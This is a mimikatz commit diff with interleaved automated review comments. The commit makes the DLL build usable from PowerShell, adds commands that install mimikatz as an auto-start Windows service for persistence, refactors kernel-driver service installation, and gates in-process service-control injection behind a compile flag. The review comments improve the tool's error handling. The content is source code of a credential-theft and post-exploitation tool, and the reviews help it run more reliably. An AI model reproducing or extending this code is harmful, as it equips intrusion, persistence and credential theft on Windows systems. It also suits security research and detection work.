One PowerShell fix and better service/token functions
[fix gentilkiwi#83] mimikatz - No ExitProcess when using DLL (for PowerShell)
[new] mimikatz - service::+ & service::- to install/uninstall
[enhancement] token::elevate & token::run
gentilkiwi committed Mar 26, 2017
1 parent 1722002 commit b0be118
Showing 14 changed files with 261 additions and 139 deletions.
1 change: 1 addition & 0 deletions inc/globals.h
Expand Up @@ -19,6 +19,7 @@
#include <wchar.h>
#include "../modules/kull_m_output.h"
//#define KERBEROS_TOOLS
//#define SERVICE_INCONTROL
//#define LSASS_DECRYPT
#define NET_MODULE
#define SQLITE3_OMIT
7 changes: 6 additions & 1 deletion mimikatz/mimikatz.c
Expand Up @@ -86,7 +86,9 @@ void mimikatz_end()
SetConsoleCtrlHandler(HandlerRoutine, FALSE);
#endif
kull_m_output_clean();
#ifndef _WINDLL
ExitProcess(STATUS_SUCCESS);
#endif
}

BOOL WINAPI HandlerRoutine(DWORD dwCtrlType)
Expand All @@ -110,7 +112,10 @@ NTSTATUS mimikatz_initOrClean(BOOL Init)
offsetToFunc = FIELD_OFFSET(KUHL_M, pInit);
hr = CoInitializeEx(NULL, COINIT_MULTITHREADED);
if(FAILED(hr))
PRINT_ERROR(L"CoInitializeEx: %08x\n", hr);
#ifdef _WINDLL
if(hr != RPC_E_CHANGED_MODE)
#endif
PRINT_ERROR(L"CoInitializeEx: %08x\n", hr);
kull_m_asn1_init();
}
else
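Review bot: In the second hunk the DLL build now accepts `RPC_E_CHANGED_MODE` from CoInitializeEx silently and carries on to kull_m_asn1_init(), but that code means this call did not initialize COM; the cleanup branch of mimikatz_initOrClean (the `else` below, outside the hunk) presumably calls CoUninitialize unconditionally, which would then release an initialization the host (for example a PowerShell STA thread) owns. Consider remembering in a file-scope flag whether `hr` was `S_OK`/`S_FALSE` and calling CoUninitialize only in that case. A short comment above the `#ifdef _WINDLL`, such as `/* RPC_E_CHANGED_MODE: host already initialised COM in another apartment; continue, but do not balance with CoUninitialize */`, would record the intent. mimikatz_initOrClean's body continues past the hunk.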
109 changes: 8 additions & 101 deletions mimikatz/modules/kuhl_m_kernel.c
Expand Up @@ -55,114 +55,21 @@ NTSTATUS kuhl_m_kernel_do(wchar_t * input)

NTSTATUS kuhl_m_kernel_add_mimidrv(int argc, wchar_t * argv[])
{
wchar_t *absFile, file[] = MIMIKATZ_DRIVER L".sys";
SC_HANDLE hSC = NULL, hS = NULL;


if(hSC = OpenSCManager(NULL, SERVICES_ACTIVE_DATABASE, SC_MANAGER_CONNECT | SC_MANAGER_CREATE_SERVICE))
wchar_t *absFile;
if(kull_m_file_getAbsolutePathOf(MIMIKATZ_DRIVER L".sys", &absFile))
{
if(hS = OpenService(hSC, MIMIKATZ_DRIVER, SERVICE_START))
{
kprintf(L"[+] mimikatz driver already registered\n");
}
else
{
if(GetLastError() == ERROR_SERVICE_DOES_NOT_EXIST)
{
kprintf(L"[*] mimikatz driver not present\n");
if(kull_m_file_getAbsolutePathOf(file, &absFile))
{
if(kull_m_file_isFileExist(absFile))
{
if(hS = CreateService(hSC, MIMIKATZ_DRIVER, L"mimikatz driver (" MIMIKATZ_DRIVER L")", READ_CONTROL | WRITE_DAC | SERVICE_START, SERVICE_KERNEL_DRIVER, SERVICE_AUTO_START, SERVICE_ERROR_NORMAL, absFile, NULL, NULL, NULL, NULL, NULL))
{
kprintf(L"[+] mimikatz driver successfully registered\n");

if(kuhl_m_kernel_addWorldToMimikatz(hS))
kprintf(L"[+] mimikatz driver ACL to everyone\n");
else PRINT_ERROR_AUTO(L"kuhl_m_kernel_addWorldToMimikatz");
}
else PRINT_ERROR_AUTO(L"CreateService");
}
else PRINT_ERROR_AUTO(L"kull_m_file_isFileExist");

LocalFree(absFile);
}
else PRINT_ERROR_AUTO(L"kull_m_file_getAbsolutePathOf");
}
else PRINT_ERROR_AUTO(L"OpenService");
}
if(hS)
{
if(StartService(hS, 0, NULL))
kprintf(L"[+] mimikatz driver started\n");
else if(GetLastError() == ERROR_SERVICE_ALREADY_RUNNING)
kprintf(L"[*] mimikatz driver already started\n");
else
PRINT_ERROR_AUTO(L"StartService");
CloseServiceHandle(hS);
}
CloseServiceHandle(hSC);
if(kull_m_file_isFileExist(absFile))
kull_m_service_install(MIMIKATZ_DRIVER, MIMIKATZ L" driver (" MIMIKATZ_DRIVER L")", absFile, SERVICE_KERNEL_DRIVER, SERVICE_AUTO_START, TRUE);
else PRINT_ERROR_AUTO(L"kull_m_file_isFileExist");
LocalFree(absFile);
}
else PRINT_ERROR_AUTO(L"OpenSCManager(create)");
else PRINT_ERROR_AUTO(L"kull_m_file_getAbsolutePathOf");
return STATUS_SUCCESS;
}

BOOL kuhl_m_kernel_addWorldToMimikatz(SC_HANDLE monHandle)
{
BOOL status = FALSE;
DWORD dwSizeNeeded;
PSECURITY_DESCRIPTOR oldSd, newSd;
SECURITY_DESCRIPTOR dummySdForXP;
SID_IDENTIFIER_AUTHORITY SIDAuthWorld = SECURITY_WORLD_SID_AUTHORITY;
EXPLICIT_ACCESS ForEveryOne = {
SERVICE_QUERY_STATUS | SERVICE_QUERY_CONFIG | SERVICE_INTERROGATE | SERVICE_ENUMERATE_DEPENDENTS | SERVICE_PAUSE_CONTINUE | SERVICE_START | SERVICE_STOP | SERVICE_USER_DEFINED_CONTROL | READ_CONTROL,
SET_ACCESS,
NO_INHERITANCE,
{NULL, NO_MULTIPLE_TRUSTEE, TRUSTEE_IS_SID, TRUSTEE_IS_WELL_KNOWN_GROUP, NULL}
};
if(!QueryServiceObjectSecurity(monHandle, DACL_SECURITY_INFORMATION, &dummySdForXP, 0, &dwSizeNeeded) && (GetLastError() == ERROR_INSUFFICIENT_BUFFER))
{
if(oldSd = (PSECURITY_DESCRIPTOR) LocalAlloc(LPTR, dwSizeNeeded))
{
if(QueryServiceObjectSecurity(monHandle, DACL_SECURITY_INFORMATION, oldSd, dwSizeNeeded, &dwSizeNeeded))
{
if(AllocateAndInitializeSid(&SIDAuthWorld, 1, SECURITY_WORLD_RID, 0, 0, 0, 0, 0, 0, 0, (PSID *)&ForEveryOne.Trustee.ptstrName))
{
if(BuildSecurityDescriptor(NULL, NULL, 1, &ForEveryOne, 0, NULL, oldSd, &dwSizeNeeded, &newSd) == ERROR_SUCCESS)
{
status = SetServiceObjectSecurity(monHandle, DACL_SECURITY_INFORMATION, newSd);
LocalFree(newSd);
}
FreeSid(ForEveryOne.Trustee.ptstrName);
}
}
LocalFree(oldSd);
}
}
return status;
}

NTSTATUS kuhl_m_kernel_remove_mimidrv(int argc, wchar_t * argv[])
{
BOOL toRemove = TRUE;
if(kull_m_service_stop(MIMIKATZ_DRIVER))
kprintf(L"[+] mimikatz driver stopped\n");
else if(GetLastError() == ERROR_SERVICE_NOT_ACTIVE)
kprintf(L"[*] mimikatz driver not running\n");
else
{
toRemove = FALSE;
PRINT_ERROR_AUTO(L"kull_m_service_stop");
}

if(toRemove)
{
if(kull_m_service_remove(MIMIKATZ_DRIVER))
kprintf(L"[+] mimikatz driver removed\n");
else
PRINT_ERROR_AUTO(L"kull_m_service_remove");
}
kull_m_service_uninstall(MIMIKATZ_DRIVER);
return STATUS_SUCCESS;
}

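Review bot: The result of `kull_m_service_install(MIMIKATZ_DRIVER, ...)` in kuhl_m_kernel_add_mimidrv and of `kull_m_service_uninstall(MIMIKATZ_DRIVER)` in kuhl_m_kernel_remove_mimidrv is discarded and both functions return STATUS_SUCCESS regardless, whereas the removed code reported each CreateService/StartService and stop/remove failure individually. Unless those helpers print their own diagnostics (not visible here), an install or uninstall failure is now silent; if they return a BOOL like the other kull_m_service_* calls the old code used, `if(!kull_m_service_install(...)) PRINT_ERROR_AUTO(L"kull_m_service_install");` and the same for uninstall restores the report. The trailing `TRUE` argument to kull_m_service_install is an unlabeled boolean; a short comment naming what it enables would help, in particular whether the removed kuhl_m_kernel_addWorldToMimikatz behaviour (granting the driver service's DACL to Everyone) moved into the helper or was dropped. The same discarded-result pattern appears in kuhl_m_service_installme and kuhl_m_service_uninstallme in kuhl_m_service.c.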
3 changes: 0 additions & 3 deletions mimikatz/modules/kuhl_m_kernel.h
Expand Up @@ -11,8 +11,6 @@
#include "../modules/kull_m_file.h"
#include "../modules/kull_m_string.h"
#include "kuhl_m_sysenvvalue.h"
#include <aclapi.h>
#include <sddl.h>

typedef struct _KUHL_K_C {
const PKUHL_M_C_FUNC pCommand;
Expand All @@ -24,7 +22,6 @@ typedef struct _KUHL_K_C {
NTSTATUS kuhl_m_kernel_do(wchar_t * input);

NTSTATUS kuhl_m_kernel_add_mimidrv(int argc, wchar_t * argv[]);
BOOL kuhl_m_kernel_addWorldToMimikatz(SC_HANDLE monHandle);
NTSTATUS kuhl_m_kernel_remove_mimidrv(int argc, wchar_t * argv[]);

NTSTATUS kuhl_m_kernel_processProtect(int argc, wchar_t * argv[]);
65 changes: 53 additions & 12 deletions mimikatz/modules/kuhl_m_service.c
Expand Up @@ -14,6 +14,8 @@ const KUHL_M_C kuhl_m_c_service[] = {
{kuhl_m_service_preshutdown,L"preshutdown", L"Preshutdown service"},
{kuhl_m_service_shutdown, L"shutdown", L"Shutdown service"},
{kuhl_m_service_list, L"list", L"List services"},
{kuhl_m_service_installme, L"+", L"Install Me!"},
{kuhl_m_service_uninstallme,L"-", L"Install Me!"},
{kuhl_m_service_me, L"me", L"Me!"},
};

Expand Down Expand Up @@ -42,7 +44,6 @@ NTSTATUS kuhl_m_c_service_clean()

NTSTATUS genericFunction(KUHL_M_SERVICE_FUNC function, wchar_t * text, int argc, wchar_t * argv[], DWORD dwControl)
{

if(argc)
{
kprintf(L"%s \'%s\' service : ", text, argv[0]);
Expand All @@ -52,11 +53,13 @@ NTSTATUS genericFunction(KUHL_M_SERVICE_FUNC function, wchar_t * text, int argc,
kprintf(L"OK\n");
else PRINT_ERROR_AUTO(L"Service operation");
}
#ifdef SERVICE_INCONTROL
else if(dwControl && (MIMIKATZ_NT_BUILD_NUMBER >= KULL_M_WIN_BUILD_7))
{
kuhl_service_sendcontrol_inprocess(argv[0], dwControl);
}
else PRINT_ERROR(L"Inject not available\n");
#endif
}
else PRINT_ERROR(L"Missing service name argument\n");

Expand Down Expand Up @@ -103,6 +106,55 @@ NTSTATUS kuhl_m_service_list(int argc, wchar_t * argv[])
return STATUS_SUCCESS;
}

const wchar_t kuhl_m_service_installme_args[] = L"rpc::server service::me exit";
NTSTATUS kuhl_m_service_installme(int argc, wchar_t * argv[])
{
#pragma warning(push)
#pragma warning(disable:4996)
wchar_t *fileName = _wpgmptr;
#pragma warning(pop)
wchar_t *absFile, *buff;
DWORD size;

if(kull_m_file_getAbsolutePathOf(fileName, &absFile))
{
if(kull_m_file_isFileExist(absFile))
{
size = 1 + lstrlen(absFile) + 1 + 1 + lstrlen(kuhl_m_service_installme_args) + 1;
if(buff = (wchar_t *) LocalAlloc(LPTR, size * sizeof(wchar_t)))
{
wcscat_s(buff, size, L"\"");
wcscat_s(buff, size, absFile);
wcscat_s(buff, size, L"\" ");
wcscat_s(buff, size, kuhl_m_service_installme_args);
kull_m_service_install(MIMIKATZ_SERVICE, MIMIKATZ L" service (" MIMIKATZ_SERVICE L")", buff, SERVICE_WIN32_OWN_PROCESS, SERVICE_AUTO_START, TRUE);
LocalFree(buff);
}
}
else PRINT_ERROR_AUTO(L"kull_m_file_isFileExist");
LocalFree(absFile);
}
else PRINT_ERROR_AUTO(L"kull_m_file_getAbsolutePathOf");
return STATUS_SUCCESS;
}

NTSTATUS kuhl_m_service_uninstallme(int argc, wchar_t * argv[])
{
kull_m_service_uninstall(MIMIKATZ_SERVICE);
return STATUS_SUCCESS;
}

NTSTATUS kuhl_m_service_me(int argc, wchar_t * argv[])
{
const SERVICE_TABLE_ENTRY DispatchTable[]= {{MIMIKATZ_SERVICE, kuhl_m_service_Main}, {NULL, NULL}};
if(hKiwiEventRunning = CreateEvent(NULL, TRUE, FALSE, NULL))
{
StartServiceCtrlDispatcher(DispatchTable);
CloseHandle(hKiwiEventRunning);
}
return STATUS_SUCCESS;
}

void WINAPI kuhl_m_service_CtrlHandler(DWORD Opcode)
{
BOOL notCoded = FALSE;
Expand Down Expand Up @@ -144,15 +196,4 @@ void WINAPI kuhl_m_service_Main(DWORD argc, LPTSTR *argv)
SetServiceStatus(m_ServiceStatusHandle, &m_ServiceStatus);
m_ServiceStatusHandle = NULL;
}
}

NTSTATUS kuhl_m_service_me(int argc, wchar_t * argv[])
{
const SERVICE_TABLE_ENTRY DispatchTable[]= {{MIMIKATZ_SERVICE, kuhl_m_service_Main}, {NULL, NULL}};
if(hKiwiEventRunning = CreateEvent(NULL, TRUE, FALSE, NULL))
{
StartServiceCtrlDispatcher(DispatchTable);
CloseHandle(hKiwiEventRunning);
}
return STATUS_SUCCESS;
}
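Review bot: `wchar_t *fileName = _wpgmptr;` in kuhl_m_service_installme is handed to kull_m_file_getAbsolutePathOf with no NULL check, and `_wpgmptr` is the deprecated CRT global the surrounding `#pragma warning(disable:4996)` is silencing; in the _WINDLL build this commit targets it would presumably hold the host process image rather than mimikatz, so the registered command line would point at the host (inferred, not visible in this hunk). A guard such as `if(!fileName) { PRINT_ERROR(L"_wpgmptr is NULL\n"); return STATUS_SUCCESS; }` before the path lookup, plus an `else PRINT_ERROR_AUTO(L"LocalAlloc");` on the `if(buff = (wchar_t *) LocalAlloc(...))` branch, keeps failures visible; the result of kull_m_service_install is also discarded, as in kuhl_m_kernel.c. In the first hunk the table entry `{kuhl_m_service_uninstallme,L"-", L"Install Me!"},` copies the description of `+` and should read `L"Uninstall Me!"`. The last hunk only moves kuhl_m_service_me up the file.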
3 changes: 3 additions & 0 deletions mimikatz/modules/kuhl_m_service.h
Expand Up @@ -6,6 +6,7 @@
#pragma once
#include "kuhl_m.h"
#include "../modules/kull_m_service.h"
#include "../modules/kull_m_file.h"
#include "kuhl_m_service_remote.h"

const KUHL_M kuhl_m_service;
Expand All @@ -24,6 +25,8 @@ NTSTATUS kuhl_m_service_resume(int argc, wchar_t * argv[]);
NTSTATUS kuhl_m_service_preshutdown(int argc, wchar_t * argv[]);
NTSTATUS kuhl_m_service_shutdown(int argc, wchar_t * argv[]);
NTSTATUS kuhl_m_service_list(int argc, wchar_t * argv[]);
NTSTATUS kuhl_m_service_installme(int argc, wchar_t * argv[]);
NTSTATUS kuhl_m_service_uninstallme(int argc, wchar_t * argv[]);
NTSTATUS kuhl_m_service_me(int argc, wchar_t * argv[]);

void WINAPI kuhl_m_service_CtrlHandler(DWORD Opcode);
4 changes: 3 additions & 1 deletion mimikatz/modules/kuhl_m_service_remote.c
Expand Up @@ -4,6 +4,7 @@
Licence : https://creativecommons.org/licenses/by/4.0/
*/
#include "kuhl_m_service_remote.h"
#ifdef SERVICE_INCONTROL

PVOID pScSendControl = NULL;

Expand Down Expand Up @@ -125,4 +126,5 @@ BOOL kuhl_service_sendcontrol_inprocess(PWSTR ServiceName, DWORD dwControl)
else PRINT_ERROR_AUTO(L"OpenProcess");
}
return status;
}
}
#endif
4 changes: 3 additions & 1 deletion mimikatz/modules/kuhl_m_service_remote.h
Expand Up @@ -5,6 +5,7 @@
*/
#pragma once
#include "kuhl_m_service.h"
#ifdef SERVICE_INCONTROL
#include "../modules/kull_m_remotelib.h"
#include "../modules/kull_m_patch.h"

Expand All @@ -16,4 +17,5 @@ DWORD kuhl_service_sendcontrol_std_thread_end();
DWORD WINAPI kuhl_service_sendcontrol_fast_thread(PREMOTE_LIB_DATA lpParameter);
DWORD kuhl_service_sendcontrol_fast_thread_end();

BOOL kuhl_service_sendcontrol_inprocess(PWSTR ServiceName, DWORD dwControl);
BOOL kuhl_service_sendcontrol_inprocess(PWSTR ServiceName, DWORD dwControl);
#endif
